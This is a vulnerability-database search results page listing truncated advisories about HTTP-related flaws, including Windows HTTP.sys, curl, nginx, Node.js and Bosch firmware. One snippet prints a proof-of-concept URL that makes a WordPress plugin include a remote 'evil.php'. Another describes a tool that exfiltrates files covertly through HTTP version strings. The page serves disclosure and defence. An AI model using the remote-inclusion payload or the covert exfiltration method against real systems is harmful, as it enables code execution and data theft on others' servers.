1081 matches found
HTTP Protocol Stack Remote Code Execution Vulnerability
...
Microsoft HTTP Protocol Stack Remote Code Execution (CVE-2022-21907)
A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...
PT-2022-1390
Name of the Vulnerable Software and Affected Versions Microsoft Windows versions prior to the fixed version, including 10 20H2, 10 21H1, 10 21H2, 10 1809, 11, Server 20H2, Server 2019, and Server versions up to 2022. Description The issue is related to a buffer overflow in the memory of the HTTP...
Cross site request forgery (csrf)
The WP Coder WordPress plugin before 2.5.2 within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE...
Modal Window < 5.2.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
RLSA-2021:4511 Moderate: curl security and bug fix update
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Security Fixes: curl: Leak of authentication credentials in URL via automatic Referer CVE-2021-22876 curl: TELNET stack contents disclosure...
Http-Protocol-Exfil - Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)
Use the HTTP protocol version to send a file bit by bit "HTTP/1.0" is a 0 and "HTTP/1.1" is a 1. It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of...
USN-5090-4 apache2 regression
USN-5090-1 fixed vulnerabilities in Apache HTTP Server. One of the upstream fixes introduced a regression in UDS URIs. This update fixes the problem. Original advisory details: James Kettle discovered that the Apache HTTP Server HTTP/2 module incorrectly handled certain crafted methods. A remote...
nodejs: Use-after-free on close http2 on stream canceling
A flaw was found in Node.js, where it is vulnerable to a use-after-free attack. This flaw allows an attacker to exploit the memory corruption, which causes a change in the process behavior. The highest threat from this vulnerability is to confidentiality and integrity...
libfetch 缓冲区错误漏洞
libfetch is a browser extension that makes it easier to access the content of electronic resources subscribed to by the NIE Library. A buffer error vulnerability exists in libfetch that stems from incorrectly handling strings of numbers for the FTP and HTTP protocols. the FTP passive mode...
Denial Of Service (DoS)
apk-tools:edge is vulnerable to denial of service. The vulnerability occurs when numeric strings in the FTP and HTTP protocols are mishandled...
Vulristics: Microsoft Patch Tuesdays Q2 2021
Hello everyone! Lets now talk about Microsoft Patch Tuesday vulnerabilities for the second quarter of 2021. April, May and June. Not the most exciting topic, I agree. I am surprised that someone is reading or watching this. For me personally, this is a kind of tradition. Plus this is an opportuni...
Exploit for Use After Free in Microsoft
CVE-2021-31166-Exploit Exploit for MS Http Protocol Stack RCE...
Unauthorized SQL Commands Over HTTP (CVE-2020-15153; CVE-2020-35545)
Unauthorized SQL Commands Over HTTP...
CVE-2021-23846
When using http protocol, the user password is transmitted as a clear text parameter for which it is possible to be obtained by an attacker through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021...
CVE-2021-23846
When using http protocol, the user password is transmitted as a clear text parameter for which it is possible to be obtained by an attacker through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021...
Design/Logic Flaw
When using http protocol, the user password is transmitted as a clear text parameter for which it is possible to be obtained by an attacker through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021...
CVE-2021-23846
The CVE-2021-23846 issue affects Bosch B426/Conettix devices. When using HTTP, the user password is transmitted as a plaintext parameter, enabling network-adjacent attackers to obtain credentials via MITM. Root cause: credentials exposed in cleartext in login handling (e.g., login.cgi). Impact al...
The vulnerability in the Install and Upgrade application for managing Oracle Transportation Execution allows a malicious individual to gain access to create, modify, or delete data.
The vulnerability of the Install and Upgrade component of the Oracle Transportation Execution application relates to insufficient validation of input data. Exploiting this vulnerability could allow an attacker to access, create, modify, or delete data using the HTTP protocol...
RLSA-2021:2259 Important: nginx:1.18 security update
nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Security Fixes: nginx: Off-by-one in ngxresolvercopy when labels are followed by a pointer to a root domain name CVE-2021-23017 For more details about the...